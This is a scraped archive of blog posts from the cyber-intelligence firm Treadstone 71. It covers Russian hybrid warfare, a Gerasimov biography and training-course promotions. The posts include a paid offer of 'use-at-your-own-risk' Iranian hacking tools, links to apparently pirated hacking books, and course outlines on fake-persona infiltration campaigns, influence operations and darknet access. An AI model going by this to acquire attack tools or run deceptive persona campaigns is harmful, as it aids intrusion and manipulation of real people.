Editor (9/14/2017) Circular polarization, Wikipedia, https://en.wikipedia.org/wiki/Circular_polarization

Editor (9/19/2017) Electromagnetic Spectrum, Wikipedia, https://en.wikipedia.org/wiki/Electromagnetic_spectrum

Editor (9/19/2017) Continuous-wave Radar, https://en.wikipedia.org/wiki/Continuous-wave_radar

Featured post

Treadstone 71 on I24News Live with David Shuster – 9/28/2017

  • Hybrid warfare – conventional, irregular, terrorist, criminal
  • Non-linear warfare includes those plus cyber, information, economic, diplomatic, political, cultural, religious, and social means

Treadstone 71 on I24News

  • Subvert the enemies social and political structure – political and social agitation, remove confidence in a system, sow seeds of discontent, pit brother against brother = create confusion and dissent. – Used to confuse, lie, misrepresent, destabilize, and facebooktwittererode the current social order the current political order
  • It can easily be said that social engineering is the exploitation of human behavior and trust.
  • Propaganda that fits my beliefs and further accentuates the ‘truth’ although false, in that belief
  • We plan… They plot. We are clever… They are sneaky. We form strategies… They conspire. We have convictions… They are fanatics.
  • The overwhelming preponderance of people have not freely decided what to believe, but, rather, have been socially conditioned (indoctrinated) into their beliefs.
  • Their thinking is largely comprised of stereotypes, caricatures, oversimplifications, sweeping generalizations, illusions, delusions, or self-serving rationalizations.
  • They see the world through ethnocentric and nationalistic eyes.
  • They stereotype people from other cultures.
  • They resent being “corrected,” disagreed with, or criticized. They want to be re-enforced, flattered and made to feel important.
  • We have a deep-seated sense of duty to authority- adults will do extreme things when instructed to do so by an authority figure
  • Social Validation (Consensus) – the behavior/opinions of similar others

I12149464887

Featured post

Valery Vasilevich Gerasimov – Валерий Васильевич Герасимов

Chief of the General Staff of the Armed Forces of the Russian Federation / First Deputy Minister of Defence of the Russian Federation, General of the Army._64031862_gerasimov

Валерий Васильевич Герасимов

Born      8 September 1955 (age 62)

Kazan, Tatar Autonomous Soviet Socialist Republic

Married – one son

Russian hackers reportedly stole NSA data via Kaspersky Lab software

http://algo.fyi/5vhjug

Born on 8 September 1955 in the city of Kazan. In 1977, he graduated from the Kazan Higher Tank Command School named after the Presidium of the Supreme Soviet of the Tatar ASSR (Autonomous Soviet Socialist Republic). He commanded platoon, company, battalion in the Northern Group of Troops and Far Eastern Military District.

vg

After his graduation from the Military Academy of Armored Troops named after Marshal of the Soviet Union R.Ya. Malinovsky in the year of 1987, he served as the chief of headquarters and commander of tank regiment, the chief of headquarters of motorized rifle division in the Baltic Military District. From 1993 to 1995 — the commander of motorized rifle division in the North-Western Group of Troops.

After graduating from the Kazan Higher Tank Command School Gerasimov was the commander of a platoon, company, and battalion of the Far Eastern Military District. Later he was chief of staff of a tank regiment and then of a motorized rifle division in the Baltic Military District. From 1993 to 1995 he was the commander of the 144th Guards Motor Rifle Division in the Baltic Military District and then the North-Western Group of Forces.

After he graduated from the General Staff’s academy he was First Deputy Army Commander in the Moscow Military District and commander of the 58th Army in the North Caucasus Military District during the Second Chechen War. His involvement in the arrest of Yuri Budanov led to praise from journalist Anna Politkovskaya.

g3In 2006, he became commander of Leningrad Military District and moved to be the commander of Moscow Military District in 2009 and Central Military District in April 2012. On 23 December 2010, he became deputy Chief of the General Staff

In 1997 after his graduation from the Military Academy of the RF Armed Forces’ General Staff, he served as the First Deputy Commander of Army in the Moscow Military District, the Deputy Commander, Chief of Staff and Commander of the 58th Army in the North Caucasian Military District.

From 2003 to 2005 — the Chief of Staff of the Far Eastern Military District. From 2005 — the Chief of the Main Administration of Combat Training and Troops’ Service of the RF Armed Forces, and from December 2006 — the Chief of Staff of the North Caucasian Military District.vg4.png

In December 2006, he was assigned as the Commander of the Leningrad Military District, and in February 2009 — as the Commander of the Moscow Military District.

From December 2010 — the Deputy Chief of the General Staff of the Armed Forces of the Russian Federation.

From 26 April 2012 — the Commander of the Central Military District.

Gerasimovs-linjal

03-02By the RF Presidential Decree of 9 November 2012, he has been appointed the Chief of the General Staff of the Armed Forces of the Russian Federation / First Deputy Minister of Defence of the Russian Federation. He was appointed by President Vladimir Putin on 9 November 2012. Some authors credit Gerasimov as the person behind a so-called “Gerasimov doctrine” – currently prevalent in Russian military strategy – combining military, technological, information, diplomatic, economic, cultural and other tactics, which are then deployed towards one set of strategic objectives. This “political warfare” is preferred due to its comparatively low cost.

vg2

The previous Chief of General Staff, Army General Nikolay Makarov, was seen as close to Serduykov and was seen by commentators as likely to be replaced by new Defence Minister Sergey Shoygu. It has been reported that Makarov resigned, but he was formally dismissed by President Vladimir Putin. Other changes were the dismissal of Alexander Sukhorukov from the position of First Deputy Defence Minister and his replacement by Colonel General Arkady Bakhin, formerly commander of the Western Military District. Aerospace Defence Forces commander Colonel General Oleg Ostapenko was also promoted to Deputy Defence Minister. He was promoted to the highest rank in the Russian Army, General of the Army as of 2014. On September 15, 2016, he and Turkish chief of staff General Hulusi Akar conducted a

03-03

meeting on the future of Syria in the Ankara headquarters of the army. That meeting will result in tightened dealings between Russia and Turkey.

There is an old Soviet-era rhetorical device that a ‘warning’ or a ‘lesson’ from some other situation is used to outline intent and plan. The way that what purports to be an after-action take on the Arab Spring so closely maps across to what was done in Ukraine is striking. Presenting the Arab Spring–wrongly–as the results of covert Western operations allows Gerasimov the freedom to talk about what he may also want to talk about: how Russia can subvert and destroy states without direct, overt and large-scale military intervention. However, the assumption that this is a Western gambit primarily does appear genuinely-held. https://inmoscowsshadows.wordpress.com/2014/07/06/the-gerasimov-doctrine-and-russian-non-linear-war/

image_f02f46e5-5865-43de-957e-a19b266b57fb20170903_133742

VPK_08_476

In April 2014 Gerasimov was added to the list of persons against whom the European Union introduced sanctions “in respect of actions undermining or threatening the territorial integrity, sovereignty, and independence of Ukraine.”

Hero of the Russian Federation.

Personal decorations: Order for Military Merits, Order for Merits to the Fatherland 4th grade, Order for Service to the Homeland in the USSR’s Armed Forces 3rd grade, Order of St. George 4th grade, Order for Merits to the Fatherland with Swords 3rd grade, Order for Honor.

The role of nonmilitary means of achieving political and strategic goals has grown, and, in many cases, they have exceeded the power of force of weapons in their effectiveness.

For me, this is probably the most important line in the whole piece, so allow me to repeat it: The role of nonmilitary means of achieving political and strategic goals has grown, and, in many cases, they have exceeded the power of force of weapons in their effectiveness. In other words, this is an explicit recognition not only that all conflicts are actually means to political ends–the actual forces used are irrelevant–but that in the modern realities, Russia must look to non-military instruments increasingly. https://inmoscowsshadows.wordpress.com/2014/07/06/the-gerasimov-doctrine-and-russian-non-linear-war/

 https://warontherocks.com/2016/03/russian-hybrid-warfare-and-other-dark-arts/

 

 

 

Featured post

Hard nosed open source collection and analysis

Syrian violations of sanctions with Russian FSB assistance to manufacture ballistic vests – Not discovered by any organization other than Treadstone 71 – No sensors, no aggregation of thousands of taps – Just hard-nosed open source collection and analysis

https://cybershafarat.com/2017/09/16/bulletproof/

Russian malware tied to BlackEnergy / Dragonfly embedded in PLC software at Delta Electronics Taiwan – before Symantec and all the large ‘cybersecurity’ firms – No sensors, no aggregation of thousands of taps – Just hard-nosed open source collection and analysis

https://cybershafarat.com/2017/09/06/dragonflydelta/

Iranian hackers and their solutions penetration Saudi companies – Alfa-Shell / solevisible – Identified 10 months ago 12/2016 long before FireEye – No sensors, no aggregation of thousands of taps – Just hard-nosed open source collection and analysis

https://cybershafarat.com/2016/12/30/solevisible/

How much are you paying for you generic data feed?

Wired
Treadstone 71 – We See What Others Cannot

Featured post

Dru’a al-Waaqiah lil-Bedoon – Syrian Sanctions Busting with Russian Help

Past report on Syrian Government collusion with Russia to bypass sanctions against Syria. This instance involves acquiring materials and machines to manufacture their own body armor in Latakia by way of the UAE where a Syrian soldier working with a female FSB agent centralize the acquisitions.

Visas, passports, military IDs, fake names, bills of lading and more for your reading and review.

The Treadstone 71 Report (pdf) – Treadstone 71 – drua-alwaaqiah-lilboodoon

Treadstone 71 acquired supporting files and documents (30MB zip) – drua-rawfiles-treadstone71

https://treadstone71llc.files.wordpress.com/2014/10/hatem-deeb-_-vk.pdf 

https://treadstone71llc.files.wordpress.com/2014/10/zain-deeb-_-vk.pdf

https://cybershafarat.com/?p=524

http://www.treadstone71.com

Featured post

Treadstone 71 Announces Cyber Intelligence Capability Maturity Model

Treadstone 71 developed a maturity model to help organizations determine the maturity of their cyber intelligence initiatives against the cyber intelligence common body of knowledge (CICBOK). The model provides strategic and operational aspects of your cyber intelligence maturity, where it needs to go, and where you should concentrate your attention to create more value for your business. Nearly 8 years in the making, the Treadstone 71 Cyber Intelligence Maturity Model uses traditional tradecraft as delivered by Sherman Kent and Richards Heuer, intelligence community standards, analytic standards, and experiential knowledge derived from years of training, assessing, and building cyber intelligence programs.

The Treadstone 71 Cyber Intelligence Capability Maturity Model (T71-CICMM) is a methodology used to develop and refine an organization’s cyber intelligence program. Not only is the model educational and practical skills for learning and developing expertise, but also a roadmap for building a cyber intelligence program. More information is available here:

Treadstone 71 Cyber Intelligence Maturity Model

T71CICMM.png

Featured post

Status – Iranian Hacking Tools

Iranian Hacking Tools

One time, 24-hour access to download the as-is Iranian Hacking tools. Approximately 1.3GB of use-at-your-own-risk tools, videos, instructions, and other information.

$4,950.00

Many have requested access to the gigabytes of Iranian hacking tools Treadstone 71 has available. You may now access these tools via a payment to Treadstone 71.

Best Regards,

Treadstone 71

Featured post

It has not changed – Russian Maskirovka – Denial and Deception

I keep a vigil in a wilderness of mirrors
Where nothing here is ever what it seems

Yuri Nosenko

yuri

“Instead of being relieved to hear that the Soviets had not been involved in the assassination, James Jesus Angleton, the C.I.A.’s legendarily suspicious counterintelligence chief, and others in the spy trade thought Mr. Nosenko’s apparent defection was a trick.”

http://www.planetreg.com/T71IntelTraining including Cyber Counterintelligence Tradecraft 

“After all, the agency had suffered a series of setbacks, including the unmasking and execution of two Russian intelligence officials who had been spying for the C.I.A. inside the Soviet Union.”

Not much has changed with respect to Russian counterintelligence activities but for the medium of use. The Internet affords great opportunities for denial and deception, counterdenial and counterdeception, ruses, feints, doubleplays, and other methods of manipulation and influence management. Want to learn more? Try Treadstone 71’s Cyber Counterintelligence Tradecraft Certification – http://www.planetreg.com/T71IntelTraining

http://www.washingtonpost.com/wp-dyn/content/article/2008/08/26/AR2008082603493

htmlhttp://mcadams.posc.mu.edu/russ/jfkinfo/jfk8/hscanpol.htm2017-04-28_7-19-37

Featured post

Intelligence for the C-Suite and Stakeholders

This is a one-day course designed to educate corporate leadership and stakeholders in cyber and threat intelligence.  There is a general awareness of the need to establish intelligence functions. Many organizations do not have a fundamental understanding of what intelligence is, where the function should reside, how it is different from business and competitive intelligence while understanding the overlaps and natural points of integration. This one day course targets corporate leadership delivering a clear and coherent training that equips stakeholders with the understanding and tools they need to assist in building a successful intelligence program.


Registration Information – Dates and Times TBD

Course High-Level Outline

  • Using Strategic Intelligence
  • Organization and Focus of the Class
  • Background on Strategic Intelligence and Analysis
  • Approaches and Processes
  • Strategic Plan development, acceptance, and dissemination
    • Mission
    • Vision
    • Guiding Principles
    • Roles and Responsibilities
    • Threat Intelligence Perspective
    • Business Intelligence Perspective
    • Competitive Intelligence Perspective
    • Intelligence Strategic Challenges
    • Goals and Initiatives
    • Next Steps
    • Roadmap
  • Stakeholder checklist and stakeholder management groups with strategic and tactical activities definition for intelligence, description of needs and products. This will include:
  • The Future Use of Strategic Intelligence
  • Intelligence: Role, Definitions, and Concepts
  • Basic Concepts Concerning Intelligence
  • The Strategic Intelligence Process – Operations to Tactics
  • The Role of Strategic Intelligence and Its Impact on Stakeholders
    • Operational, Technical, Tactical
  • Why Stakeholders and Executives Need Strategic Analysis:
  • Strategic Analysis Leading to Strategic Decisions
  • Implementing Intelligence Programs
    • The Treadstone 71 Method (Experience with several program builds globally)
  • Challenges for Stakeholders to Accept Intelligence
  • Stakeholder Views: Impact on Intelligence
  • Intelligence as Catalyst for Stakeholders
  • Integrating Analytical Support and the Stakeholder Thought Process
  • Stakeholders and Self-Directed Strategic Processes, Procedures, Methods
  • The Role of Intelligence Management
  • Issues, Tactics, Techniques, Methods, and Principles
  • Managing Intelligence Projects
  • Providing Focused Leadership
    • Leading the Team
    • Understanding Issues and the Process
    • Analysis Overview
    • Collection Management
    • Production Management
      • Evaluation
      • Analysis
      • Integration
      • Interpretation
    • Types of Analysis
      • 14 Types of Analysis
    • Analytic Writing
      • ICD 203, 206, 208
      • Organization, Evidence, Argument, Sources, Pitfalls
      • Use the Title
      • Who/What, Why Now, So What, Impact so far, Outlook, Implications
      • BLUF and AIMS
      • Supervisory Actions
      • Summary Paragraphs
      • Alternative Analysis
      • Clarity and Brevity
      • Peer review
      • Reports and Reporting
        • Feedback
    • Pre-Mortem
    • Post-Mortem
    • Know your professor, get an A – Communicating Up
      • Relevance, Timeliness, Completeness, Accuracy, Usability
    • Briefing Rules
  • Intelligence Analysts and Self-Management
    • High-Level Tasks
  • Analyst Activities
    • Rules for developing analysts – Alignment and as collectors
    • The Role, Responsibilities, and Functions of the Analyst
    • The Analyst’s Roles and Responsibilities – RACI(s)
    • What the Analyst will face
    • Job Descriptions
  • Conclusion
    • The Executive / Stakeholder’s Roadmap
Corporate stakeholders risk investing large amounts of time and money with little positive effect their security, corporate strategies, and business direction. The C-Suite and Stakeholders participating in this course ensures their understanding of the discipline required to build a successful program. The course helps align information security, incident response, security operations, threat and cyber intelligence with the business.
Featured post

Training Report – Treadstone 71 Cyber Intelligence Tradecraft Professional Certification

“This past week, I had the absolute pleasure of attending the 5-day Treadstone 71 Cyber Intelligence Tradecraft Professional Certification course along with three of my colleagues.  Mr. Jeff Bardin was the instructor and his knowledge and depth in this area is exceptionally impressive!cyberintelt71

The training allows students to gain a better understanding of the cyber intelligence life cycle, the role and value of cyber intelligence relative to online targeting and collection, in modern organizations, businesses, and governments at the completion of this course. In addition, students understand: the methods of online anonymity, the fundamentals behind cyber intelligence collection and analysis, and how these current methods can be employed in our organizations to assist in online operational security and in defense against adversaries. The course was a combination of lecture, hands-on and student deliverables seen by many as an apprenticeship. We completed 4 case studies throughout the week in varying subjects such as Iranian hackers, high financial networks, Russian SCADA equipment, etc.

I would highly recommend this course to anyone looking to further their knowledge in the cyber area.  It will also allow you to become a better intelligence analyst, as a whole.  Overall, it was a truly fantastic learning experience that is applicable in both our personal, as well as professional lives.  I most certainly have a new appreciation for online security and safety.” – Recently certified student February 2017

Featured post

Suggested Reads by Iranian Hackers

https://www.cs.utexas.edu/~jason777/Programming/Connect Four/Connect Four/Project/2011 – Assembly Language for x86 Processors 6e (Prentice Hall).pdf
[2011_Assembly_Language_for_x86_Processors.pdf] 1.8 MB

http://profmsaeed.org/wp-content/uploads/2015/02/IntelAsseblyLanguage.pdf

staff.ustc.edu.cn/~sycheng/ssat/books/The.IDA.Pro.Book.2ed.pdf

http://www.foo.be/cours/dess-20122013/b/Eldad_Eilam-Reversing__Secrets_of_Reverse_Engineering-Wiley(2005).pdf

http://www.chinastor.org/upload/2015-08/15081917086229.pdf

https://doc.lagout.org/network/2_Hack/Reverse Engineering of Object Oriented Code.pdf

https://download.adamas.ai/dlbase/ebooks/VX_related/Identifying Malicious Code Through Reverse Engineering.pdf

http://www.staroceans.org/kernel-and-driver/Assembly Language Step-By-Step – Programming with Linux, 3rd edition (Wiley, 2009, 0470497025).pdf

coolfire.insomnia247.nl/Hacker Disassembling Uncovered.pdf

Featured post

2017 Training Courses – Treadstone 71

2017 Training Dates

Main Page to Treadstone 71 Training – 2017

(or on demand including in-house or by location)

Treadstone 71 is working with FS-ISAC for training in London, Singapore, Malaysia, and Australia.

FS-ISAC Sponsored Courses:

Cyber Intelligence Tradecraft Training
3-7 April | Reston, VA
More | Register
Cyber Intelligence Tradecraft Training
8-12 May | London
More | Register
Cyber Intelligence Tradecraft Training
19-23 June | Reston, VA
More | Register
Cyber Intelligence Tradecraft Training
21-25 August | Reston, VA
More | Register

Featured post

Full Suite of Cyber-Threat Intelligence and Counterintelligence Courses Ready for Global Delivery

Treadstone 71 today announced a full suite of Cyber and Threat Intelligence and CounterIntelligence training courses. The courses drive the expansion of Treadstone 71’s accelerated, academically validated, intelligence training to global markets. Treadstone 71 delivers courses in California, Virginia, Canada, the United Kingdom, and the Netherlands and is set to expand to the Middle East and Asia later this year. (www.planetreg.com/T71IntelTraining)

Treadstone 71 offers a compelling business model that delivers rapid cyber and threat intelligence strategic planning, program build, and targeted training in sectors such as financial services, government, healthcare, energy, and other critical infrastructure verticals. Treadstone 71’s format, curriculum, and instruction model are helping meet critical global demand for cyber and threat intelligence and analysis expertise. Treadstone 71 training provide graduates with an attractive pathway to compensation increases, career progression, and much-needed attention to intelligence. The organization has been teaching cyber intelligence at the Master’s level and commercially for seven years. New courses include a focus on campaign management, the use of Tor, Tails, I2P, and Maltego as well as covering persona development and management. Students create a series of identities, character development, and dimensions, storyline, plot synopsis, story drive and limit, story weaving, applicability, scope, tools to be used, methods of interaction with other identities, engaging secondary characters, refining targeting while developing a campaign to gain street credentials.

“Our courses provide academic instruction combined with real-world, hands-on collection, analysis, analytic writing, dissemination, and briefings that many liken to an apprenticeship,” said Jeff Bardin, Chief Intelligence Officer for Treadstone 71. “Our curriculum follows the teachings of Sherman Kent and Richards Heuer giving students the tools necessary to perform targeted collection, structured analysis while authoring reports modeled after intelligence community standards. We teach methods of cyber infiltration, information and influence operations, counterintelligence strategies, mission based counterintelligence, denial and deception, and counter-denial and deception.”

Treadstone 71 courses are validated and proven by intelligence professionals creating job-ready threat intelligence professionals for global organizations suffering a talent shortage. “Intelligence analysis as an inherently intellectual activity that requires knowledge, judgment, and a degree of intuition,” continued Bardin. “Treadstone 71’s intelligence, counterintelligence, and clandestine cyber HUMINT training and services help organizations transform information into intelligence pertinent to their organization.”

Analysis includes integrating, evaluating, and analyzing all available data — which is often fragmented and even contradictory — and preparing intelligence products. Despite all the attention focused on the operational (collection) side of intelligence, analysis is the core of the process to inform corporate stakeholders. Analysis as more than just describing what is happening and why; identifying a range of opportunities… Intelligence Analysis is the key to making sense of the data and finding opportunities to take action. Analysis expands beyond the technical focus of today providing organizations with core capabilities for business, competitive, cyber, and threat intelligence.

Treadstone 71’s Cyber Intelligence Tradecraft Certification is the gold standard in the industry today derived from both academia and from Treadstone 71’s experience in building cyber intelligence programs at Fortune 500 organizations worldwide.

Treadstone 71

888.714.0071 – osint@treadstone71.comhttp://www.planetreg.com/T71IntelTraining

Featured post

We Are in a State of Cyber Cold War?

Wisdom begins with the definition of terms – Socrates

Many believe that we are not in some sort of state of cyber warfare. Many believe that it is only influence operations. These are the same people who are selling you security technologies and services to protect your environment. They believe calling our current state cyber war is hype. They fact that they believe this is demonstrated in their technologies that have double and triple downed on solutions that do not work. Solutions based solely on see, detect, and arrest. A paradigm proven over the past 20 years to be a paradigm of failure. The game of many a vendor (not all) is to generate revenue off your fear. A fear that can be remedied if we fix information security by first starting to fix information technology (see Cyber Security Predictions – Not Reality TV – Just Daytime Entertainment). One of the problems we have is standard taxonomy and glossary. Most do not have an understanding of the basics of intelligence and war. Most feel the need to apply physical characteristics to cyber actions in order for those actions to be taken as some sort of warfare. This is a major misnomer. My request here is for you to read the limited glossary items below. Once you have read these items, think of where we are today with respect to cyber security. If after reading and applying critical thinking to the terms and our current state of cyber security you do not believe we are in a state of cyber cold war, then provide some well thought out comments as to what state we are in fact in.

Information Operations (IO). The integrated employment of the core capabilities of electronic warfare, computer network operations, psychological operations, military deception, and operations security, in concert with specified supporting and related capabilities, to influence, disrupt, corrupt or usurp adversarial human and automated decision making while protecting our own. (JP 1-02)

           This includes five core capabilities incorporated into IO

  1. Electronic warfare is any action involving the use of the electromagnetic spectrum or directed energy to control the spectrum, attack of an enemy, or impede enemy assaults via the spectrum.
  2. Computer Network Operations (CNO)
    1. Comprised of computer network attack, computer network defense, and related computer network exploitation enabling operations (JP 1-02)
  3. Psychological operations
    1. Planned operations to convey selected information and indicators to foreign audiences to influence their emotions, motives, objective reasoning, and ultimately the behavior of foreign governments, organizations, groups, and individuals. The purpose of psychological operations is to induce or reinforce foreign attitudes and behavior favorable to the originator’s objectives. (JP 1-02 and JP 3-13.2)
  4. Military Deception
    1. Actions executed to deliberately mislead adversary military decision makers as to friendly military capabilities, intentions, and operations, thereby causing the adversary to take specific actions (or inactions) that will contribute to the accomplishment of the friendly mission. (JP 1-02)
    2. According to JP 3-13.4, Counterintelligence provides the following for MILDEC planners:
    3. Identification and analysis of adversary intelligence systems to determine the best deception conduits;
    4. Establishment and control of deception conduits within the adversary intelligence system, also known as offensive CI operations;
    5. Participation in counterdeception operations;
    6. Identification and analysis of the adversary’s intelligence system and its susceptibility to deception and surprise; and
    7. Feedback regarding adversary intelligence system responses to deception operations.
  5. Operations Security

*******

Treadstone71 2017 Cyber Intel Courses – http://www.planetreg.com/T71IntelTraining

*******

OPSEC is a five-step iterative process that assists an organization in identifying specific pieces of information requiring protection and employing measures to protect them.

  1. Identification of Critical information: Critical information is information about friendly intentions, capabilities and activities that allow an adversary to plan effectively to disrupt their operations. U.S. Army Regulation 530-1 has redefined Critical Information into four broad categories, using the acronym CALI- Capabilities, Activities, Limitations (including vulnerabilities), and Intentions.This step results in the creation of a Critical Information List (CIL). This allows the organization for focus resources on vital information, rather than attempting to protect all classified or sensitive unclassified information. Critical information may include, but is not limited to, military deployment schedules, internal organizational information, details of security measures, etc.
  2. Analysis of Threats: A Threat comes from an adversary – any individual or group that may attempt to disrupt or compromise a friendly activity. Threat is further divided into adversaries with intent and capability. The greater the combined intent and capability of the adversary, the greater the threat. This step uses multiple sources, such as intelligence activities, law enforcement, and open source information to identify likely adversaries to a planned operation and prioritize their degree of threat.
  3. Analysis of Vulnerabilities: Examining each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then comparing those indicators with the adversary’s intelligence collection capabilities identified in the previous action. Threat can be thought of as the strength of the adversaries, while vulnerability can be thought of as the weakness of friendly organizations.
  4. Assessment of Risk: First, planners analyze the vulnerabilities identified in the previous action and identify possible OPSEC measures for each vulnerability. Second, specific OPSEC measures are selected for execution based upon a risk assessment done by the commander and staff. Risk is calculated based on the probability of Critical Information release and the impact if such as release occurs. Probability is further subdivided into the level of threat and the level of vulnerability. The core premise of the subdivision is that the probability of compromise is greatest when the threat is very capable and dedicated, while friendly organizations are simultaneously exposed.
  5. Application of Appropriate OPSEC Measures: The command implements the OPSEC measures selected in the assessment of risk action or, in the case of planned future operations and activities, includes the measures in specific OPSEC plans. Countermeasures must be continually monitored to ensure that they continue to protect current information against relevant threats.The U.S. Army Regulation 530-1 refers to “Measures” as the overarching term, with categories of “Action Control” (controlling one’s own actions); “Countermeasures” (countering adversary intelligence collection); and “Counteranalysis” (creating difficulty for adversary analysts seeking to predict friendly intent) as tools to help an OPSEC professional protect Critical Information.

Offensive Cyber Operations. Programs and activities that through the use of cyberspace, 1) actively gather information from computers, information systems or networks or 20 manipulate, disrupt, deny, degrade, or destroy targeted adversary computers, information systems, or networks. (NSPD-38)

Cold War – a state of political hostility between countries characterized by threats, propaganda, and other measures short of open warfare – a conflict or dispute between two groups that does not involve actual fighting.

2017-01-16_18-37-11.jpg

Cyber War – the use of computer technology to disrupt the activities of a state or organization, especially the deliberate attacking of information systems for strategic or military purposes. Cyber warfare involves the actions by a nation-state or international organization to attack and attempt to damage another nation’s computers or information networks through, for example, computer viruses or denial-of-service attacks.

Try this link for more definitions https://ccdcoe.org/cyber-definitions.html

To repeat. think of where we are today with respect to cyber security. Apply critical thinking to the terms and our current state of cyber security. Assess our relationship with Russia. Provide some well thought out comments as to what state we are in fact in if you believe we are not in a state of cyber cold war with Russia. If we are not, then how would you define our current state?

Treadstone 71

 

 

 

Featured post

Cyber Security Predictions – Not Even Reality TV – Just Daytime Entertainment

The plethora of 2017 cyber security predictions do nothing but distract practitioners from executing actual controls and methods of defense and prevention. Each year we get slammed with predictions that are never followed, are common sense, and serve to market and sell products and services. The so-called information and cyber security experts, many times self-proclaimed, spew predictions on all potential areas. This is not much more than fake news and methods to direct readers to vendor products. The vendor products that claim to solve these predictions and therefore, become self-fulfilling prophecies. For the most part, once the predictions are published, the follow-up to their success is non-existent. Their purposes are to market and sell, drive perception, manage the market, and drive a false sense of vendor expertise.

We should focus on actual problem resolution and change the failed paradigm within which security exists. We continue to propagate vendor products and services that do not work, only treating the symptoms. This is not much different from the pharmaceutical industry that markets pills to you each evening during the news and prime time. Pills that treat symptoms and cause more side effects than they do solve issues. Advertisements that drive up the cost of the product manipulating the market and those that prescribe the ‘solutions’ to recommend purchase.

The only way we change this paradigm, and I mean we, is to push back on these vendors to solve problems and quit selling products that treat symptoms. We must also correct our own internal behaviors. A few weeks ago, I published a potential list of 12 items to change this paradigm (the 12th is a shameless plug so 11). They are listed below.

We need to forget the Jerry Springer-like entertainment of annual cyber predictions and focus on solving the hard problems we face.

What does Treadstone 71 seek? We seek an end to the noise and an understanding that our information, our intellectual property, and our way of life is under constant siege. We are in a cyber war with skirmishes and battles occurring 24×7. We need to direct the carpetbagging vendors to cease in their war profiteering and take a moral stance in fighting our adversaries. We also need to correct and adjust how we run IT and information security. The list of 11 is below. We welcome your comments, your additions, and your assistance in this call to action to change the failed paradigm.

Treadstone 71

  1. All CIOs must have served as a CISO for at least four years before being allowed to be a CIO.
  2. All CIOs must have a CISSP, CISM, and at least two technical information security certifications and have been thoroughly trained and qualified to be a CIO. No more cronyism.
  3. CISOs will never report to the CIO – conflict of interest and a recipe for … what we have now.
  4. If you are the administrator for a device, you secure that device (servers, routers, appliances, etc.). You are responsible and accountable – Secure what you own. Secure what you manage.
  5. CIOs and their leadership will be held liable for deploying vulnerable systems.
  6. All new products (IoT and beyond) must be certified secure before public release. No more figure it out as we go and bolt it on after we have consumers hooked.
  7. All root access / administrative rights for production, critical, supporting, etc., systems and devices are removed and granted only for approved changes and incidents.
  8. All written code and script must be written properly. There is no such thing as secure code, only code the works correctly and does not create vulnerabilities.

Treadstone 71 2017 Intelligence Training Courses – Sign up now or inquire about how to have us come onto your site to training.

  1. All operating systems will be shipped closed and installed closed with a risk rating system for each port, protocol, and service. Each modification reduces the security posture of the operating system providing a risk score while automatically offering advice on how to remediate that score with other controls.
  2. New regulations to enforce security and privacy, demanding disclosure of breaches,  fining companies and individuals for negligence are put in place, at once.
  3. Vendors posting adversary IoCs, TTPs, and other methods that would normally be seen as ‘telling the enemy what we know, i.e., sedition’ will be fined for such activity.
  4. You will tell yourselves over and over again that contracting with Treadstone 71 to build your cyber intelligence strategy and program is the absolute right thing to do (repeat after me …).

Decided to add a real 12:

  1. Let’s create a focused call to action to change the paradigm. Open to suggestions, dedicated forums, public push to change vendors, public push to force IT to change.

Call to Action!

Featured post

Igor Valentinovich Korobov, the current chief of a military intelligence agency Игорь Валентинович Коробов

korobov-bio

Игорь Валентинович Коробов

Treadstone 71 2017 Intelligence Training Courses – Sign up now or inquire about how to have us come onto your site to training.

Glavnoje Razvedyvatel’noje Upravlenije
ГРУ ГШ ВС РФ
Главное Разведывательное Управление

Agency overview
Formed May 7, 1992
Preceding agencies
Jurisdiction President of Russia
Headquarters Grizodubovoy str. 3, Moscow
Minister responsible
Agency executive
  • Igor Korobov, Chairman
Parent agency Ministry of Defense
Child agencies
  • Svyazinformsoyuz Company
  • Directorate for Space Intelligence

440px-generalstaff_central_dep-svg

Featured post

The 12 Days of Cyber Christmas

…or What I want for Cyber Security and Intelligence Christmas 2016

  1. All CIOs must have served as a CISO for at least 4 years before being allowed to be a CIO.
  2. All CIOs must have a CISSP, CISM, and at least 2 technical information security certifications and have been thoroughly trained and qualified to be a CIO. No more cronyism.
  3. CISOs will never report to the CIO – conflict of interest and a recipe for … what we have now.
  4. If you are the administrator for a device, you secure that device (servers, routers, appliances, etc.). You are responsible and accountable – Secure what you own. Secure what you manage.
  5. CIOs and their leadership will be held liable for deploying vulnerable systems.
  6. All new products (IoT and beyond) must be certified secure before public release. No more figure it out as we go and bolt it on after we have consumers hooked.
  7. All root access / administrative rights for production, critical, supporting, etc., systems and devices are removed and granted only for approved changes and incidents.
  8. All written code and script must be written properly. There is no such thing as secure code, only code the works correctly and does not create vulnerabilities.

Treadstone 71 2017 Intelligence Training Courses – Sign up now or inquire about how to have us come onto your site to training.

    9. All operating systems will be shipped closed and installed closed with a risk rating system for each port, protocol, and/or service. Each modification reduces the security posture of the operating system providing a risk score while automatically offering advice on how to remediate that score with other controls. 

    10. New regulations to enforce security and privacy, demanding disclosure of breaches,    fining companies and individuals for negligence are put in place, at once.

    11. Vendors posting adversary IoCs, TTPs, and other methods that would normally be seen as ‘telling the enemy what we know, i.e., sedition’ will be fined for such activity.

  12. You will tell yourselves over and over again that contracting with Treadstone 71 to build your cyber intelligence strategy and program is the absolute right thing to do (repeat after me …).

Merry Cyber Christmas from Treadstone 71

img_0668

Featured post

Clandestine Cyber HUMINT 

CLANDESTINE CYBER HUMINT/OSINT COURSE

Course snippet non-inclusive of Tails, Tor, Dark Net, and Oryon:

Treadstone 71 2017 Intelligence Training Courses – Sign up now or inquire about how to have us come onto your site to training.

Find the course information and registration here:

CLANDESTINE CYBER HUMINT/OSINT COURSE

…..

1. Anonymity
2. What is anonymity online?
3. Tails
1. What is Tails?
2. Tails and Tor Bridge Mode
3. Tor Project
1. Overview
2. Who uses Tor?
3. Tor – A Layman’s Guide
4. Tails – Tor enforcement
5. Tails Installation Assistant
6. Install from Windows
7. I2P Anonymous Network
8. Intro I2P

…..

4. Information Warfare and Cyber Psychological Operations
1. Target analysis and message manipulation where applicable
1. Gathered data
2. Organized and decomposed data points
a. Established timelines
b. Created adversary dossiers and organization charts

…..

5. Intro to the Darknet
5.1 Introduction to the Darknet (NOTE: Some/Many of the sites come and go and may not be available for review)
5.1.1 How to Access Onion Sites
5.1.2 Tor – Download, Installation, Use
5.1.3 Markets to Search
5.1.4 Site for Exploration:

 

…..

 

 

 

Featured post

Amsterdam, NL 1/30-2/3/2017 Cyber Intel Training

Registration Information – Treadstone 71 Cyber Intelligence Tradecraft Certification
